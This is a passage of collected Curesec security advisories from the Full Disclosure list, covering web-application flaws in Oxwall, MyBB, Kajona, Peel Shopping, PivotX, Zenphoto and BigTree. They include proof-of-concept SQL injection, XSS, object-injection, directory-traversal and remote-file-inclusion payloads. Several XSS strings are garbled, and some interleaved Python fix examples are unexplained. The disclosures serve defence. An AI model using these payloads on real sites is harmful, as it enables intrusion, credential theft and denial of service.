Oxwall is social networking software written in PHP. In version 1.8.0, it is vulnerable to multiple XSS attacks and a persistent open redirect. The XSS vulnerabilities are reflected as well as persistent, and can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

When performing a ping request, the method value is echoed unencoded, leading to reflected XSS.

Proof of Concept:

    http://localhost/oxwall-1.8.0/base/ping/index/"; method="POST"> ","params":{}}]}" />

Code: ow_system_plugins/base/controllers/ping.php

        $responseStack[] = array(
            'command' => $c['command'],
            'result' => $event->getData()
        );
    }

    echo json_encode(array(
        'stack' => $responseStack
    ));

XSS 2: Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name of a photo album is vulnerable to persistent XSS in two places: when viewing a user profile, and after editing the album. Both of these are DOM based XSS vulnerabilities, and both of them require some interaction of the victim, e.g. hovering or clicking.

Proof of Concept:

0. Register an account
1. Create a new album with the name '">
2. Visit the user's profile: http://localhost/oxwall-1.8.0/user/[username]
3. Hover over the image belonging to that album

An alternative to steps 2. and 3. is:

2. Use CSRF to log the victim into the account with the injected album name
3. Use ClickJacking to get the user to click "Edit Album" and then click "Done"

XSS 3: Self-XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

The chat window is vulnerable to self-XSS. It may be possible to exploit this issue via ClickJacking in some browsers.

Proof of Concept:

Open a chat and paste the following into the text field (there is no need to send it, although that would trigger the vulnerability again as well):

    '">

Persistent Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The real name of a user is echoed inside meta tags without proper encoding. Tags are stripped, which prevents an attacker from adding new tags, but it is still possible to add additional attributes to the meta tag, leading to an open redirect and potentially XSS in older browsers.

Proof of Concept:

1. Register a new user. As real name use: 5;URL=http://google.com/"; http-equiv="refresh" foo="
2. Visit the profile of that user: http://localhost/oxwall-1.8.0/user/[username]

4. Solution

To mitigate this issue please upgrade at least to version 1.8.2.

Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date
12/15/2015 Vendor requests more time
01/13/2016 Contacted Vendor, Vendor requests more time
02/01/2016 Contacted Vendor, Vendor requests more time
02/22/2016 Vendor releases fix
09/15/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Oxwall-180-XSS-amp-Open-Redirect-148.html
[FD] MyBB 1.8.6: Improper validation of data passed to eval
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  Improper validation of data passed to eval
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it improperly validates templates that are passed to eval, allowing for the disclosure of the database password. If the database is writable from remote, it may also lead to code execution. An admin account is required.

3. Details

Description

CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N

MyBB allows an admin to edit templates. These templates can contain HTML, and it is possible to read out the content of PHP variables as well as the properties of objects. There are filters in place which should make it impossible to call functions or to read out sensitive information such as database credentials.

Templates are used as follows:

    eval('$variable = "'.$templates->get('templateName').'";');

$templates->get returns the template as saved in the database, with double quotes and slashes escaped.

When saving a template, the template is passed to the check_template function to check if it contains malicious content. The checks try to prevent the reading of the database password as well as the calling of functions. This means that none of the naive attempts to read out the database password - e.g. $config['database']['password'], $config[database][password], or $config ["database"]["password"] - would work.

However, it is still possible to read out the database password by setting the value of an existing variable to "password" and using that variable when reading out the password, thus bypassing the filter.

Proof of Concept

First, edit a template such as the usercp_profile_contact_fields_field template:

    http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15

Add this line at the beginning:

    {$cfvalue}: {$config['database'][$cfvalue]}

Now, visit the profile:

    http://localhost/mybb_1806/Upload/usercp.php?action=profile

As any of the "Additional Contact Information" values, use "password" to read out the database password, "hostname" to read out the hostname, and "username" to read out the user.

In case the database is writable from remote, an attacker could now also gain code execution, as check_template is applied when saving templates, not when loading them. Example query:

    UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title="usercp_profile_contact_fields_field";

Visiting the profile will execute the injected code.

Code

inc/config.php

    $config['database']['password'] = '[THE_DATABASE_PASSWORD]';

admin/inc/functions.php

    function check_template($template)
    {
        // Check to see if our database password is in the template
        if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template))
        {
            return true;
        }

        // System calls via backtick
        if(preg_match('#\$\s*\{#', $template))
        {
            return true;
        }

        // Any other malicious acts?
        // Courtesy of ZiNgA BuRgA
        if(preg_match("~\\{\\$.+?\\}~s", preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_ 0-9 ]+\\2\\]\s*)*\\}~', '', $template)))
        {
            return true;
        }

        return false;
    }

usercp.php (as one example)

    foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield)
    {
        $contact_fields[$cfield] = '';
        $csetting = 'allow'.$cfield.'field';
        if($mybb->settings[$csetting] == '')
        {
            continue;
        }

        if(!is_member($mybb->settings[$csetting]))
        {
            continue;
        }

        $cfieldsshow = true;
        $lang_string = 'contact_field_'.$cfield;
        $lang_string = $lang->{$lang_string};

        $cfvalue = htmlspecialchars_uni($user[$cfield]);
        eval('$contact_fields[$cfield] = "'.$templates->get('usercp_profile_contact_fields_field').'";');
    }

4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Di
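To see concretely why the check_template denylist above rejects the literal forms but not the variable-indexed one, here is a Python transcription of it, added here and not MyBB code: the three regexes are the PHP ones quoted in the advisory with PHP string escaping resolved, and check_template_strict() is an illustrative tighter rule, not the vendor's 1.8.7 fix.

```python
"""MyBB 1.8.6's check_template() denylist, transcribed to Python.

Added illustration, not MyBB code: the three regexes are the PHP ones quoted
above with PHP string escaping resolved; check_template_strict() is an
illustrative tighter rule, not the vendor's fix.
"""
import re

# admin/inc/functions.php, first check: literal database/password access.
DB_PASSWORD_RE = re.compile(r"database'?\s*\]\s*\[\s*'?password")
# Second check: "${" (the comment in the original calls this the backtick check).
BRACE_EXPR_RE = re.compile(r"\$\s*\{")
# Third check, step 1: remove well-formed variable references such as
# {$var}, {$obj->prop}, {$arr['key']} and, crucially, {$arr[$idx]}.
KNOWN_VARIABLE_RE = re.compile(
    r"\{\$+[a-zA-Z_][a-zA-Z_0-9]*"
    r"((?:-\>|\:\:)\$*[a-zA-Z_][a-zA-Z_0-9]*"
    r"|\[\s*\$*(['\"]?)[a-zA-Z_ 0-9 ]+\2\]\s*)*\}"
)
# Third check, step 2: anything {$...} left over is rejected.
LEFTOVER_BRACE_RE = re.compile(r"\{\$.+?\}", re.S)


def check_template(template: str) -> bool:
    """True means 'reject', mirroring MyBB's function."""
    if DB_PASSWORD_RE.search(template):
        return True
    if BRACE_EXPR_RE.search(template):
        return True
    leftover = KNOWN_VARIABLE_RE.sub("", template)
    return LEFTOVER_BRACE_RE.search(leftover) is not None


# Illustrative additions (not MyBB's fix): the bypass in the advisory needs a
# variable as array index and a reference to $config, so refuse both outright.
DYNAMIC_INDEX_RE = re.compile(r"\[\s*\$")
CONFIG_REF_RE = re.compile(r"\$config\b")


def check_template_strict(template: str) -> bool:
    """Reject everything check_template rejects, plus $config references and
    variable-indexed lookups. A denylist like this still only narrows the
    problem; an allowlist of exposed template variables is the robust fix."""
    if check_template(template):
        return True
    return bool(CONFIG_REF_RE.search(template) or DYNAMIC_INDEX_RE.search(template))


if __name__ == "__main__":
    samples = [
        "{$config['database']['password']}",            # caught by the first regex
        '{$config ["database"]["password"]}',           # caught by the leftover check
        "{${phpinfo()}}",                               # caught by the "${" check
        "{$cfvalue}: {$config['database'][$cfvalue]}",  # the advisory's bypass
        "<b>{$lang->username}</b>",                     # legitimate template
    ]
    for s in samples:
        print(f"{s!r:48} original={check_template(s)!s:6} strict={check_template_strict(s)}")
```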
[FD] MyBB 1.8.6: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a second order SQL injection by an authenticated admin user, allowing the extraction of data from the database.

3. Details

Description

CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P

The setting threadsperpage is vulnerable to second order error based SQL injection. An admin account is needed to change this setting. The injection takes place into a LIMIT clause, and the query also uses ORDER BY, making a UNION ALL injection impossible, but it is still possible to extract information.

Proof of Concept

Go to the settings page:

    http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7

For Setting "threadsperpage" use:

    20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Visit a forum to trigger the injected code:

    http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3

The result will be:

    SQL Error: 1105 - XPATH syntax error: ':5.5.33-1'
    Query: SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Code

forumdisplay.php

    $perpage = $mybb->settings['threadsperpage'];
    [...]
    $query = $db->query("
        SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
        FROM ".TABLE_PREFIX."threads t
        LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
        WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
        ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
        LIMIT $start, $perpage
    ");

4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
[FD] MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: MyBB 1.8.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.mybb.com/
Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Full Disclosure / Informational
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext.

3. Login CSRF

Description

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS.

Proof of Concept

http://localhost/mybb_1806/Upload/member.php"; method="POST">
http://localhost/mybb_1806/Upload/index.php"; />

4. Weak Hashing

Description

MyBB uses md5 for hashing passwords, which is not considered secure. The hashing used is:

$hash = md5(md5($salt).md5($password));

5. Passwords Emailed in Plaintext

Description

When passwords are reset, the generated 8 character password is sent to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required. It is recommended to use a password reset token instead, and to force the user to create a new password themselves.

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases new version
03/15/2016 Requested information about unfixed issues
03/15/2016 Vendor considers issues minor and will not fix them for now
09/15/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html
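Added example (Python, not MyBB's PHP) for the weak-hashing finding: the advisory's md5(md5($salt).md5($password)) scheme next to a salted, iterated KDF, plus a verify-then-rehash step so a legacy md5 record is replaced the next time the user logs in. The pbkdf2$ record layout and the iteration count are assumptions of this example, not anything MyBB uses.

```python
import hashlib
import hmac
import os

# The scheme quoted in the advisory: md5(md5($salt).md5($password)), where the
# inner digests are hex strings that get concatenated. It is salted, but three
# md5 calls per guess is still cheap enough to brute-force at high speed.
def mybb_hash(salt: str, password: str) -> str:
    inner = hashlib.md5(salt.encode()).hexdigest() + hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5(inner.encode()).hexdigest()

# Assumed record format for this example: pbkdf2$<iterations>$<salt hex>$<dk hex>
PBKDF2_ITERATIONS = 310_000

def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Fresh random salt per user, deliberately slow derivation."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${dk.hex()}"

def verify_password(record: str, password: str) -> bool:
    """Recompute the derived key from the stored parameters and compare in constant time."""
    try:
        scheme, iters, salt_hex, dk_hex = record.split("$")
        if scheme != "pbkdf2":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    except ValueError:  # wrong field count, bad hex, non-numeric iteration count
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)

def login_and_upgrade(stored: dict, password: str):
    """stored holds the user's "salt" and "password" columns (constructed shape).
    Returns (ok, new_record). When the row still carries a legacy md5 hash and
    the password is correct, new_record is the PBKDF2 record to write back."""
    current = stored["password"]
    if current.startswith("pbkdf2$"):
        return verify_password(current, password), None
    expected = mybb_hash(stored["salt"], password)
    if not hmac.compare_digest(expected, current):
        return False, None
    return True, hash_password(password)

if __name__ == "__main__":
    legacy_row = {"salt": "abcdefgh", "password": mybb_hash("abcdefgh", "correct horse")}
    ok, new_record = login_and_upgrade(legacy_row, "correct horse")
    print("legacy login ok:", ok)
    print("rehashed as:", new_record)
```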
[FD] Kajona 4.7: XSS & Directory Traversal
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Kajona 4.7
Fixed in: 5.0
Fixed Version Link: https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable to multiple XSS attacks and limited directory traversal. The XSS vulnerabilities are reflected as well as persistent, and can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. The directory traversal issue gives information about which files exist on a system, and thus allows an attacker to gather information about a system.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The function that parses admin requests echoes user input into a JavaScript context without escaping, leading to reflected XSS. As the injection takes place into a JavaScript context, browser filters will generally not be able to filter out an attack. In the case of Kajona, XSS may lead to code execution, as admins can upload PHP files via the media manager.

Proof of Concept:

http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='

Code:

core/module_system/system/class_request_dispatcher.php

$strReturn = "";

XSS 2: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The media manager echoes the form_element parameter into a JavaScript context without escaping, leading to reflected XSS. As the injection takes place into a JavaScript context, browser filters will generally not be able to filter out an attack. Note that a valid systemid is required.

Proof of Concept:

http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#

Click on the "Accept" overlay of an image to trigger the injected code.

XSS 3: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The "class_messageprovider_exceptions_enabled" parameter of the xml.php script is vulnerable to reflected XSS.

Proof of Concept:

http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<%2fa>&messageprovidertype=class_messageprovider_exceptions

XSS 4: Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

When creating a comment, the subject is vulnerable to persistent XSS. The click of an admin is required to execute the injected JavaScript code.

Proof of Concept:

1. Leave a comment: http://localhost/kajona/index.php?page=postacomment
2. As subject, use: ');alert('1
3. Visit the comment overview: http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)

Directory Traversal

When viewing images, the file name is improperly sanitized, allowing for directory traversal. It is not possible to actually read out files, as there are additional checks in place preventing that. But an unauthenticated attacker can still see which files exist on a system and which do not, making it possible to collect information for further attacks.

Proof of Concept:

GET /kajona/image.php?image=/files/images/upload///////download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)

GET /kajona/image.php?image=/files/images/upload///////foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404

Code:

core/module_system/image.php

public function __construct() {
    //find the params to use
    $this->strFilename = urldecode(getGet("image"));

    //avoid directory traversing
    $this->strFilename = str_replace("../", "", $this->strFilename);
    [...]
}

[...]

private function resizeImage() {
    //Load the image-dimensions
    if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
        [...]
    }
    class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
    class_response_object::getInstance()->sendHeaders();
}

4. Solution

To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-T
[FD] Peel Shopping 8.0.2: Object Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Peel Shopping 8.0.2
Fixed in: 8.0.3
Fixed Version Link: www.peel-shopping.com
Vendor Website: www.peel-shopping.com
Vulnerability Type: Object Injection
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection. Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and thus has limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required. The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Cookie: last_views=[INJECTED_OBJECT];

DOS Example:

The Smarty_Internal_Configfileparser class can be used to create an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Cookie: last_views=%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d;
Connection: close

(Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3.
Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Peel-Shopping-802-Object-Injection-164.html
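The root cause above is that the last_views cookie is trusted as a serialized PHP object. Added example (Python, not Peel Shopping's code) of the usual fix: keep the cookie data-only (a JSON list of product ids), authenticate it with an HMAC so the server only decodes what it produced, and check the shape after decoding. The secret key, cookie layout and sample values are constructed for this example.

```python
import base64
import binascii
import hashlib
import hmac
import json

MAC_LEN = hashlib.sha256().digest_size  # 32 bytes appended to the payload

def encode_last_views(product_ids, secret: bytes) -> str:
    """Cookie value = base64url( JSON payload || HMAC-SHA256(secret, payload) )."""
    payload = json.dumps(list(product_ids), separators=(",", ":")).encode()
    mac = hmac.new(secret, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + mac).decode()

def decode_last_views(cookie: str, secret: bytes):
    """Return the list of product ids, or [] for anything the server did not sign.
    No part of the cookie is interpreted before the MAC has been verified."""
    try:
        raw = base64.urlsafe_b64decode(cookie.encode())
    except (ValueError, binascii.Error):
        return []
    if len(raw) <= MAC_LEN:
        return []
    payload, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return []
    try:
        data = json.loads(payload)
    except ValueError:
        return []
    # Shape check: a flat list of non-negative ints; objects or nested data are refused.
    if not isinstance(data, list) or not all(
        isinstance(x, int) and not isinstance(x, bool) and x >= 0 for x in data
    ):
        return []
    return data

# URL-decoded payload from the advisory (copied here for the demo): a serialized
# Smarty_Internal_Configfileparser object. It carries no valid MAC, so it is dropped.
ADVISORY_PAYLOAD = (
    'O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;'
    's:11:"yyTokenName";a:0:{}}'
)

if __name__ == "__main__":
    key = b"constructed-demo-key"
    cookie = encode_last_views([1, 42, 7], key)
    print("signed cookie:", cookie)
    print("decoded:", decode_last_views(cookie, key))
    print("advisory payload decodes to:", decode_last_views(ADVISORY_PAYLOAD, key))
```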
[FD] PivotX 2.3.11: Reflected XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PivotX 2.3.11
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Reflected XSS
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode: Full Disclosure
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to reflected XSS, allowing for the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of PivotX, this may lead to code execution via other vulnerabilities in the same version in the admin area.

3. Details

Description

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The additionalpath parameter of the file explorer is vulnerable to reflected XSS.

Proof of Concept

http://localhost/pivotx_latest/pivotx/index.php?page=homeexplore&additionalpath=pivotalert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Reflected-XSS-155.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Zenphoto 1.4.11: RFI
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 03/15/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is vulnerable to remote file inclusion. An admin account is required.

3. Details

Description

CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

When downloading a log file, the input is not properly sanitized, leading to RFI. An admin account is required, and allow_url_fopen must be set to true - which is the default setting. In old versions of PHP, this would additionally lead to LFI via null byte poisoning or path expansion, regardless of allow_url_fopen settings.

Proof of Concept

GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1

Code

// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
    $zipname = sanitize($_GET['tab'], 3) . '.zip';
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        $zip->open($zipname, ZipArchive::CREATE);
        $zip->addFile($file, basename($file));
        $zip->close();
        ob_get_clean();
        header("Pragma: public");
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private", false);
        header("Content-Type: application/zip");
        header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: " . filesize($zipname));
        readfile($zipname);
        // remove zip file from temp path
        unlink($zipname);
        exit;
    } else {
        include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
        $zip = new ZipStream($zipname);
        $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
        $zip->finish();
    }
    break;

4. Solution

To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
[FD] PivotX 2.3.11: Directory Traversal
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PivotX 2.3.11
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode: Full Disclosure
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to Directory Traversal, allowing authenticated users to read and delete files outside of the PivotX directory.

3. Details

Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

The function cleanPath which is responsible for sanitizing path names can be bypassed by an attacker, leading to directory traversal in multiple places.

Proof of Concept

Admins and Superadmins can read any file:

http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=.././/...//.//...//.//...//.//...//.//...//.//...//etc/passwd

Advanced users, Admins and Superadmins can delete any file, possibly leading to DOS:

http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.//...//.//...//.//...//.//...//.//...//.//...//important/important.file&pivotxsession=ovyyn4ob2jc5ym92

Code

lib.php

function cleanPath($path) {
    $path = str_replace('../', '', $path);
    $path = str_replace('..\\', '', $path);
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
[FD] BigTree 4.2.8: Object Injection & Improper Filename Sanitation
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: BigTree 4.2.8
Fixed in: BigTree 4.2.9
Fixed Version Link: https://www.bigtreecms.org/download/
Vendor Website: https://www.bigtreecms.org/
Vulnerability Type: Object Injection & Improper Filename Sanitation
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 03/15/2016
Release mode: Coordinated Release
CVE: n/a

Credits
Tim Coen of Curesec GmbH

2. Overview

BigTree CMS is a CMS written in PHP. In version 4.2.8, it is vulnerable to object injection. The impact of this vulnerability is currently small - privileged users can update settings they are not allowed to update - but may be more extensive depending on installed plugins.

